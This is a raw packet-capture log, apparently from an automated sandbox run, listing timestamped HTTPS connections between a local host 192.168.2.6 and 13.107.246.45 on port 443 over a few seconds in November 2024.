                                                        Nov 12, 2024 16:28:01.401916981 CET4435000213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.401968956 CET50002443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.401972055 CET4435000213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.402070999 CET50002443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.438880920 CET50002443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.438903093 CET4435000213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.504714966 CET50005443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.504774094 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.504966021 CET50005443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.507405996 CET50005443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.507431984 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.569190025 CET50006443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.569235086 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.569302082 CET50006443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.573396921 CET50006443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.573411942 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.803205967 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.803230047 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.803308010 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.803324938 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.803364992 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.803555012 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.803581953 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.803596020 CET50003443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.803601980 CET4435000313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.807043076 CET50007443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.807095051 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:01.807172060 CET50007443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.807404995 CET50007443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:01.807420969 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.045420885 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.046045065 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.046058893 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.046580076 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.046585083 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.179301023 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.179328918 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.179392099 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.179406881 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.179419994 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.179460049 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.179703951 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.179714918 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.179737091 CET50004443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.179743052 CET4435000413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.182974100 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.183020115 CET4435000813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.183140039 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.183362007 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.183374882 CET4435000813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.225634098 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.226129055 CET50005443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.226171017 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.226589918 CET50005443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.226596117 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.352593899 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.352618933 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.352677107 CET50005443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.352710009 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.352963924 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.353017092 CET50005443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.353492975 CET50005443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.353511095 CET4435000513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.359430075 CET50009443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.359477997 CET4435000913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.359546900 CET50009443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.359730005 CET50009443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.359740973 CET4435000913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.533715963 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.534265041 CET50006443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.534296036 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.534758091 CET50006443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.534764051 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.578121901 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.578630924 CET50007443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.578656912 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.579108000 CET50007443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.579113007 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.668509007 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.668734074 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.672230005 CET50006443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.673257113 CET50006443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.673276901 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.673302889 CET50006443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.673307896 CET4435000613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.676882982 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.676932096 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.677135944 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.677135944 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.677167892 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.714762926 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.714828014 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.715126038 CET50007443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.715178967 CET50007443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.715179920 CET50007443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.715198994 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.715213060 CET4435000713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.718390942 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.718435049 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.718565941 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.718739986 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.718751907 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.910540104 CET4435000813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.911159039 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.911189079 CET4435000813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:02.911689043 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:02.911700010 CET4435000813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.088325024 CET4435000813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.088397980 CET4435000813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.088675976 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.088675976 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.088676929 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.091378927 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.091434002 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.091578007 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.091711998 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.091727972 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.238939047 CET4435000913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.239495993 CET50009443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.239532948 CET4435000913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.240015984 CET50009443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.240021944 CET4435000913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.379081964 CET4435000913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.379154921 CET4435000913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.379442930 CET50009443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.379443884 CET50009443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.379511118 CET50009443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.379523039 CET4435000913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.382536888 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.382579088 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.382807016 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.382807016 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.382838964 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.399693012 CET50008443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.399713993 CET4435000813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.420217991 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.421133995 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.421133995 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.421169996 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.421180010 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.479922056 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.480741978 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.480741978 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.480767012 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.480782032 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.619680882 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.619724989 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.619777918 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.619808912 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.619834900 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.620105982 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.620124102 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.620157003 CET50011443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.620163918 CET4435001113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.623240948 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.623282909 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.623486042 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.623718023 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.623733997 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.695673943 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.695699930 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.695760012 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.695792913 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.695903063 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.696197033 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.696209908 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.696247101 CET50010443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.696252108 CET4435001013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.700181007 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.700225115 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.700539112 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.704137087 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.704153061 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.818744898 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.819796085 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.819796085 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:03.819825888 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:03.819844007 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.067446947 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.067478895 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.067495108 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.067576885 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.067576885 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.067601919 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.067713022 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.070070982 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.070141077 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.070169926 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.070228100 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.070228100 CET50012443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.070246935 CET4435001213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.073097944 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.073137045 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.073569059 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.073569059 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.073599100 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.128809929 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.129712105 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.129712105 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.129740953 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.129759073 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.260646105 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.260668039 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.260725975 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.260756016 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.260889053 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.261079073 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.261091948 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.261116982 CET50013443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.261123896 CET4435001313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.264314890 CET50017443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.264358044 CET4435001713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.264580965 CET50017443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.264816046 CET50017443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.264837027 CET4435001713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.365147114 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.365617990 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.365636110 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.366130114 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.366137028 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.420655012 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.421648979 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.421649933 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.421678066 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.421694994 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.550282955 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.550307035 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.550368071 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.550407887 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.550607920 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.550607920 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.550672054 CET50015443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.550688982 CET4435001513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.553567886 CET50018443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.553611040 CET4435001813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.553822994 CET50018443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.553988934 CET50018443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.554006100 CET4435001813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.621499062 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.621524096 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.621557951 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.621639013 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.621670961 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.621694088 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.621822119 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.742336035 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.742399931 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.742458105 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.742482901 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.742525101 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.742712021 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.742712021 CET50014443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.742736101 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.742747068 CET4435001413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.746027946 CET50019443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.746088028 CET4435001913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.746191978 CET50019443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.746356964 CET50019443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.746376038 CET4435001913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.798633099 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.799604893 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.799606085 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.799617052 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.799638033 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.928493023 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.928518057 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.928883076 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.928894997 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.928956985 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.928986073 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.928986073 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.929008007 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.929033995 CET50016443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.929040909 CET4435001613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.932136059 CET50020443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.932171106 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.932432890 CET50020443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.932678938 CET50020443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:04.932686090 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:04.999355078 CET4435001713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.000159979 CET50017443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.000200033 CET4435001713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.000435114 CET50017443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.000441074 CET4435001713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.297574997 CET4435001713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.297660112 CET4435001713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.297933102 CET50017443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.297934055 CET50017443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.298007011 CET50017443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.298027039 CET4435001713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.299438000 CET4435001813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.299997091 CET50018443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.300013065 CET4435001813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.300457001 CET50018443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.300465107 CET4435001813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.301064014 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.301105976 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.301351070 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.301351070 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.301383018 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.433290005 CET4435001813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.433347940 CET4435001813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.433619976 CET50018443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.433619976 CET50018443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.433651924 CET50018443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.433665991 CET4435001813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.436738968 CET50022443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.436775923 CET4435002213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.436881065 CET50022443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.437077999 CET50022443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.437096119 CET4435002213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.468444109 CET4435001913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.469402075 CET50019443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.469402075 CET50019443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.469444990 CET4435001913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.469461918 CET4435001913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.616633892 CET4435001913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.616702080 CET4435001913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.617017031 CET50019443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.617017031 CET50019443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.617069960 CET50019443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.617090940 CET4435001913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.620170116 CET50023443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.620232105 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.620362043 CET50023443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.620467901 CET50023443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.620484114 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.668889999 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.669431925 CET50020443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.669449091 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.669882059 CET50020443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.669887066 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.798688889 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.798755884 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.798815966 CET50020443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.799093008 CET50020443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.799104929 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.799206972 CET50020443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.799211979 CET4435002013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.802298069 CET50024443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.802334070 CET4435002413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:05.802443981 CET50024443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.802669048 CET50024443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:05.802680969 CET4435002413.107.246.45192.168.2.6
